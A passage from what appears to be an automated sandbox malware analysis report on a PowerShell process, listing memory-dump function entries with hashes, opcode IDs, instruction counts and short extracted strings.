                                                                              • Instruction Fuzzy Hash: 8F919F34A012489FCB14DFA9D844AAEBBF2FF89315F1485ADE4459B361CB35EC86CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8DBE Relevance: .2, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 66dea43af468ee859be22e7c3acc7c75ff8fc4527a9837543027bfb4ee08f9f9
                                                                              • Instruction ID: 6470e860bc08b2592e95106460c8ce5e7a3a7c49e05d73437af27447780e1222
                                                                              • Opcode Fuzzy Hash: 66dea43af468ee859be22e7c3acc7c75ff8fc4527a9837543027bfb4ee08f9f9
                                                                              • Instruction Fuzzy Hash: CC712970E002089FCB14EFA5D484BADBBF6BF88305F15856DE416AB794DB30AD46CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C87BA Relevance: .2, Instructions: 170COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 977677cb4eb69a24c0c7e6cc3a4fa115f0b25c43ebf411731f81ac27dbed342b
                                                                              • Instruction ID: faf8460b1136ee06fbe4e151db00c61c010ac41859f28872422582b228b138a9
                                                                              • Opcode Fuzzy Hash: 977677cb4eb69a24c0c7e6cc3a4fa115f0b25c43ebf411731f81ac27dbed342b
                                                                              • Instruction Fuzzy Hash: F6614B34A00649CFCB14DFA5D544AADBBF2BF88301F258558E402AF765DB74AD89CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C87C8 Relevance: .2, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c31272ce8d0efd3119e0623cbd3dc48c15582443ecde543e240bb2a2b1a9d599
                                                                              • Instruction ID: e704abdfce18504671a1680096c2cfe59699a4ff1d5dec719deda04f1e4c1640
                                                                              • Opcode Fuzzy Hash: c31272ce8d0efd3119e0623cbd3dc48c15582443ecde543e240bb2a2b1a9d599
                                                                              • Instruction Fuzzy Hash: B6612B34E00649CFCB14DFA5C554A9DBBB2FF88301F158558E402AF369DB74AD89CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8C93 Relevance: .2, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31736fec1acf173bd76360c79688e184059ffa7feababb3fe47630b45e050997
                                                                              • Instruction ID: 38aefc805b5e3af60a93f4cb186353c0db9955949fdd218211b4648fa9b1c78f
                                                                              • Opcode Fuzzy Hash: 31736fec1acf173bd76360c79688e184059ffa7feababb3fe47630b45e050997
                                                                              • Instruction Fuzzy Hash: AA515E70A002089FCB14DFA9D840AADBBF6FF88315F15896DD4169B751DB31BC45CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CB2FC Relevance: .1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f598b586a638250babbd4be72c09d6c5d08ffe6b0dcdb04c1109966cce524f5
                                                                              • Instruction ID: 91f4b3383ab45b91bad70e99610dc19307d6ef55210f3d9060455eabbd1a32ca
                                                                              • Opcode Fuzzy Hash: 9f598b586a638250babbd4be72c09d6c5d08ffe6b0dcdb04c1109966cce524f5
                                                                              • Instruction Fuzzy Hash: A4416D71B416009FD714DB75E9A8AAE7BB6EF88354F14446CE406EB3A0EB35BC41CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CCAE1 Relevance: .1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef763141572f71e757687320e4bd57540b24fcc6c740eee581f771db76d532df
                                                                              • Instruction ID: dd7f5087064c27f72fa8f50485135cf6eb00b22890821d9465b71d3c8dd73506
                                                                              • Opcode Fuzzy Hash: ef763141572f71e757687320e4bd57540b24fcc6c740eee581f771db76d532df
                                                                              • Instruction Fuzzy Hash: 5351C974A002099FDB15DFA8D484A9DFBB2FF88314F24C559E409AB355C771EC86CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8DFF Relevance: .1, Instructions: 91COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6e8ca81f46d694e963d8ef57b218142154fb642886b224835123e02594bb843
                                                                              • Instruction ID: 46bbb74e2cc4b04223d0dd859fcc6b2611541b2b83c403c62c30c5c62d30cdeb
                                                                              • Opcode Fuzzy Hash: d6e8ca81f46d694e963d8ef57b218142154fb642886b224835123e02594bb843
                                                                              • Instruction Fuzzy Hash: B4314731A01118AFCB14EFA4D480BEDB7F6AF89305F15846EE411AB750DB30AD4ACB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8B18 Relevance: .1, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b0542100cd06794aa02851e933f76c22bc3b139b19fd823ffbefe90bd99fecd
                                                                              • Instruction ID: 60f25ab133dd714865d0c940357c0bda953ab8137cfb0a75b077be8d5dfbe1fb
                                                                              • Opcode Fuzzy Hash: 9b0542100cd06794aa02851e933f76c22bc3b139b19fd823ffbefe90bd99fecd
                                                                              • Instruction Fuzzy Hash: 2F319C75B401049FCB14EF29D898BAD7BB2AF8C321F15416DE406EB7A1DB71AC41CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CC038 Relevance: .1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d9fe0370eae4381a1a6b28d9046e466bd591f4f2b1371e4421f54a08112bfd8c
                                                                              • Instruction ID: aab0de9766fdfcb28b0f2dcbb7acf8ce2d4554ce272c818902e41ed2a0cfd003
                                                                              • Opcode Fuzzy Hash: d9fe0370eae4381a1a6b28d9046e466bd591f4f2b1371e4421f54a08112bfd8c
                                                                              • Instruction Fuzzy Hash: B0312B75A045099FCB05CF5CC9809AAFBB1FF49320B258699E919EB751C732ED81CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B2C5D Relevance: .1, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: af5865ebeecafa8c1d254defabcc8bd690c3d5b4ac1e31551d92924bd678ed20
                                                                              • Instruction ID: 8c30b0d2d0fb4e065b4699399c935108f47ce6b8c6f9af7ec196939a97c9d723
                                                                              • Opcode Fuzzy Hash: af5865ebeecafa8c1d254defabcc8bd690c3d5b4ac1e31551d92924bd678ed20
                                                                              • Instruction Fuzzy Hash: 082127F3B002018BFB319B558510BFB77A2BB85314F548659DA059FBA5CB35D842C771
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8478 Relevance: .1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4c4095ba1097f25672c81b0685d462531dcfe417d306708413fa7098e5410fd3
                                                                              • Instruction ID: e086b1b454b80872ac86df84c07add9d927afe294511651449bceede488f8a79
                                                                              • Opcode Fuzzy Hash: 4c4095ba1097f25672c81b0685d462531dcfe417d306708413fa7098e5410fd3
                                                                              • Instruction Fuzzy Hash: CA21DE70A083858FC742EB79E4419AE7FB1BF49210B05859EE0059F362E770AA858BD2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C31C8 Relevance: .1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b2af202bdc9de646207b3bc33ac67f7f0eb1d6f3517be34aa42dc1402bdcfdb
                                                                              • Instruction ID: 31392d2d98e5c9b373e4e112afcadd212efc66eed747068d871ac0fd92516f7c
                                                                              • Opcode Fuzzy Hash: 2b2af202bdc9de646207b3bc33ac67f7f0eb1d6f3517be34aa42dc1402bdcfdb
                                                                              • Instruction Fuzzy Hash: 60212CB4A042199FCB01CF99C9809AEBBB1FF89310B15859AE915EB352C731FD41CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8720 Relevance: .1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b90f60de70d38ca0df963d26814d7854e4afe395f6c7ce708de6be11033a3cf
                                                                              • Instruction ID: 7274e1f3e4d1315ec48743e59a7b61b669f62c64ec144e8c0881932ac905e0d8
                                                                              • Opcode Fuzzy Hash: 2b90f60de70d38ca0df963d26814d7854e4afe395f6c7ce708de6be11033a3cf
                                                                              • Instruction Fuzzy Hash: 9111B235209740CFC7169B69D408B96BBA9EF86315F1A40EEE00CCF6A2C776E84AC751
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CAAD2 Relevance: .1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbcda7b8a622eacfd02fc57cb5d588b4eb021661297a9a5215e36d38cc9fd250
                                                                              • Instruction ID: b5312c46541b669fee2111f34c22e858b293928e539786f0de9f8285667b9cb9
                                                                              • Opcode Fuzzy Hash: fbcda7b8a622eacfd02fc57cb5d588b4eb021661297a9a5215e36d38cc9fd250
                                                                              • Instruction Fuzzy Hash: F901F5317057888FC721CF66D814BB7BBAADB82315F0881AED0488BB51CA39EC85C760
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8710 Relevance: .0, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 654241b0f46fbf3d0eb7b1707206923bd5285827e98c65606b4a4330f144bc09
                                                                              • Instruction ID: 48c059ea3dbef52aca6915f218746c15cda1e7780dd4b4aac9d0a27b694bb398
                                                                              • Opcode Fuzzy Hash: 654241b0f46fbf3d0eb7b1707206923bd5285827e98c65606b4a4330f144bc09
                                                                              • Instruction Fuzzy Hash: 5E01D835300300DFCB15EB56D544EA6F7F8EBC671670645AEE4088B351D736E846C791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047CCBEC Relevance: .0, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 427e053d9156c216b3b505ab4c4cd85736b8f0786642341300efe6d159f547b9
                                                                              • Instruction ID: 4577d55cf6bce2a84f78f7ab3bbf553991bc8b64bb19d7627c8ab400409df565
                                                                              • Opcode Fuzzy Hash: 427e053d9156c216b3b505ab4c4cd85736b8f0786642341300efe6d159f547b9
                                                                              • Instruction Fuzzy Hash: 5011A774A04209EFDB45CFA8D484A9DFBB2FF48314F24C559E419AB365C771A986CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C86B0 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 451907dfa1bc5a750140ee3b1d73cea09f4bb9a8b247bcdc52c8adc445b9085f
                                                                              • Instruction ID: c1152924a0b259bc0381a2039fb5b2febf79f41e137a89c91ce304f4c3416185
                                                                              • Opcode Fuzzy Hash: 451907dfa1bc5a750140ee3b1d73cea09f4bb9a8b247bcdc52c8adc445b9085f
                                                                              • Instruction Fuzzy Hash: FD01F7352097808FCB129715D854A917FB4AF8634570B45EFD04CCF263D329EC4AC792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B0AB9 Relevance: .0, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1ee62f979a4d6100e9e5eb027ee0a636fe4768d196bebbea181d010607c50256
                                                                              • Instruction ID: 8bef945f781d23ca5192de1b1dd2a876b7e4f4a05baa1acfd8349eadb8d93961
                                                                              • Opcode Fuzzy Hash: 1ee62f979a4d6100e9e5eb027ee0a636fe4768d196bebbea181d010607c50256
                                                                              • Instruction Fuzzy Hash: 46F0FCB2A08A15DFC32C4A04D580557F7E5FF85769F30892DD89B53604C731EC41D790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C86D0 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80826de2d8e34db2c30d151f00acbfbf669213e7a5585b9d2a46f560fe475731
                                                                              • Instruction ID: 054d516af45cf20d8ba49fe8f3ecbce3eb279ae5bd61385679a19c239412b3c8
                                                                              • Opcode Fuzzy Hash: 80826de2d8e34db2c30d151f00acbfbf669213e7a5585b9d2a46f560fe475731
                                                                              • Instruction Fuzzy Hash: CAF0F635201300CFC716A745D444A91BBA8EBCA356B0741DEE0088F351D731E846C762
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C2D5E Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 61e6aca6e0ee1c92f398c0013d5aed495d2abba08bb3998c544ee99cf1ded27b
                                                                              • Instruction ID: b2332b581e8b2abddf949bfb3c8b80c8e11ce1dd745f3ca2155ddd3712069e6c
                                                                              • Opcode Fuzzy Hash: 61e6aca6e0ee1c92f398c0013d5aed495d2abba08bb3998c544ee99cf1ded27b
                                                                              • Instruction Fuzzy Hash: 66F0B735A001059FCB15CB9CD890AEEF7B1FF88324F248159E515A72A1C732A852CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 047C8518 Relevance: .0, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 19dfe05ccbd754827d9fcab29a1bc6c072990f70338f70b43f29c823851d2407
                                                                              • Instruction ID: 52ba1c8f1f590874c284cce71e6bfb02a66ab9988ae5b032f7720ce175e13fe1
                                                                              • Opcode Fuzzy Hash: 19dfe05ccbd754827d9fcab29a1bc6c072990f70338f70b43f29c823851d2407
                                                                              • Instruction Fuzzy Hash: 7EF0A974E0020A8FC780DF69D485AAEBBF0FF49314F504199E509EB321E730A941CBD1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 073BC9E5 Relevance: 19.0, Strings: 15, Instructions: 285COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$84|l$84|l$84|l$84|l$tPtq$tPtq$tPtq$tPtq$$tq$(zq$(zq$(zq$(zq
                                                                              • API String ID: 0-328628920
                                                                              • Opcode ID: fdb5c4dd03b06c481bca01b5429c77e24ddafa1cea45ca7966e4834b09fa97e5
                                                                              • Instruction ID: 3bf899f833fc238386d3dc451b5ff94391ce2de081f546b3904c496c58b4541c
                                                                              • Opcode Fuzzy Hash: fdb5c4dd03b06c481bca01b5429c77e24ddafa1cea45ca7966e4834b09fa97e5
                                                                              • Instruction Fuzzy Hash: DDA128B1B0011A9FEF34DF69C4016EAFBA6AB88310F149459EA09AF791DB31DD41C7B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B5300 Relevance: 12.9, Strings: 10, Instructions: 397COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                              • API String ID: 0-2206979638
                                                                              • Opcode ID: 4886dd4b550a62aee5cc231b25a76d4009d1fa3d574bbc44f05d0db0d244b229
                                                                              • Instruction ID: 5dc06dc315f9a2b67438a751cf31ccae3db5b9b5768e0876444ba57ab0053464
                                                                              • Opcode Fuzzy Hash: 4886dd4b550a62aee5cc231b25a76d4009d1fa3d574bbc44f05d0db0d244b229
                                                                              • Instruction Fuzzy Hash: 16C17BF170420A8FEB354A7994407AABBA6AFC5211F24807BE60ECBB41DF31C951C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BDBC0 Relevance: 12.9, Strings: 10, Instructions: 374COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l$4'tq$4'tq$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-2984239535
                                                                              • Opcode ID: 521f1eb43d96b972af77c05bda15378946f2597801f754cff678841e57d06064
                                                                              • Instruction ID: 8cb5dde27a0d21d94d0db6bd97bb45116755173a12af3a069a5928046d48e6a3
                                                                              • Opcode Fuzzy Hash: 521f1eb43d96b972af77c05bda15378946f2597801f754cff678841e57d06064
                                                                              • Instruction Fuzzy Hash: 05E1D8B1B102099BEB24DBA9C541BEEBBB3AF89310F148419D6056FB55DF31EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B2838 Relevance: 12.8, Strings: 10, Instructions: 326COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq$tl$tl
                                                                              • API String ID: 0-2584504867
                                                                              • Opcode ID: b420f1c91202d8d65a69512f609cdd099813ab3b412e3c70f3346fef42729310
                                                                              • Instruction ID: f0378452481483cb66fab9b27b35183f725f1e81dc23fa092166b2e490da41dd
                                                                              • Opcode Fuzzy Hash: b420f1c91202d8d65a69512f609cdd099813ab3b412e3c70f3346fef42729310
                                                                              • Instruction Fuzzy Hash: 01A13AB270424A8FE7359A7998017A7BBE6BFC6220F14816BD60DCB791DE31CC41C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073B4D30 Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq
                                                                              • API String ID: 0-3031240953
                                                                              • Opcode ID: e246c8cb6f12c2986bcdd7f7d8745508a6c09c48c89c1ec4dac5bc99fea1ce11
                                                                              • Instruction ID: 5174afb9521fcbc4dbee1c8dd1689e97deb861fd5a26b7123819b56bee7858a2
                                                                              • Opcode Fuzzy Hash: e246c8cb6f12c2986bcdd7f7d8745508a6c09c48c89c1ec4dac5bc99fea1ce11
                                                                              • Instruction Fuzzy Hash: E3A148B1B041499FEB359BA9D4006EABBA2EBC5310F14C16ADA098FB42DF31DD51C7D1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BD465 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$84|l$XRyq$XRyq$XRyq$tPtq$tPtq$$tq
                                                                              • API String ID: 0-191154098
                                                                              • Opcode ID: 0d3927c77e06c246f07415471ee4d41b2db6fa4e46cf4346df15a935cf0fbe49
                                                                              • Instruction ID: d752d5a75a3852a66a87fc5255f7b8d303034d750ef532557097267349ebb769
                                                                              • Opcode Fuzzy Hash: 0d3927c77e06c246f07415471ee4d41b2db6fa4e46cf4346df15a935cf0fbe49
                                                                              • Instruction Fuzzy Hash: BA612BF17141169FEB349B698440AEAFBB2AF89314F14C06ADA099FB51CB31DD41CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BDBBA Relevance: 7.8, Strings: 6, Instructions: 300COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-2242134050
                                                                              • Opcode ID: bb56d60cfebcd7f68ff6e1ba3e898881631babfc0764a8f60fc6ee256c84eaee
                                                                              • Instruction ID: ffa05abb4455a560efa9d86412b1444ba4a99b6ffa3611336ead44e911003029
                                                                              • Opcode Fuzzy Hash: bb56d60cfebcd7f68ff6e1ba3e898881631babfc0764a8f60fc6ee256c84eaee
                                                                              • Instruction Fuzzy Hash: 63C191B1B10209DBEB24DF98C541BEEBBB2AF89314F148519D6096FB55CB32EC42CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 073BCDF5 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
